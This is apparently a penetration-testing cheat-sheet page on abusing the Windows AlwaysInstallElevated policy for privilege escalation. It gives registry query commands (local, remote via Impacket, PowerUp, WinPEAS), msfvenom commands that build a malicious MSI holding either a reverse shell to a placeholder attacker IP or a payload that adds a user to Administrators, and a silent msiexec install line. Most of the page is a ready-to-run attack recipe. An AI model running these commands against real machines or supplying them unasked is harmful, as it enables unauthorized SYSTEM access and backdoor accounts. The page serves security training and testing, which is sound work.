AlwaysInstallElevated

MITRE ATT&CK™ System Binary Proxy Execution: Msiexec - Technique T1218.007

Theory

The AlwaysInstallElevated policy feature offers ALL users on a Windows operating systems the ability to install an MSI package file with elevated (system) privileges.

Practice

If it is enabled, it will create the value AlwaysIntstallElevated and set it to 0x1 (enabled) on the following two registry keys. Impacket's reg.py (Python) script can be used to query registry remotely from a UNIX-like machine.

reg.py domain.local/username:password123@<TARGET_IP> query -keyName "HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer" -v AlwaysInstallElevated
reg.py domain.local/username:password123@<TARGET_IP> query -keyName "HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer" -v AlwaysInstallElevated

Manual verification of the activation of this parameter is very simple and can be done with two commands. If it is enabled, it will create the value AlwaysIntstallElevated and set it to 0x1 (enabled) on the following two registry keys.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Alternatively, using PowerUp from Powersploit we can enumerate the AlwaysInstallElevated policy.

. .\PowerUp.ps1
Invoke-AllChecks

Alternatively, using the systeminfo module of WinPeas

winPEASx64.exe systeminfo

We just have to generate a malicious MSI file and install it with msiexec.exe

Generate a malicious MSI

# Reverse Shell
v4resk㉿kali$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKING_IP> LPORT=<ATTACKING_PORT> -f msi > package.msi

# Add user to Administrators
v4resk㉿kali$ msfvenom -p windows/exec CMD='net localgroup administrators <YOUR_USER> /add' -f msi > package.msi

Then, after downloading it to the target, install the MSI file using msiexec

msiexec.exe /quiet /qn /i package.msi

Resources

Last updated 1 year ago

Was this helpful?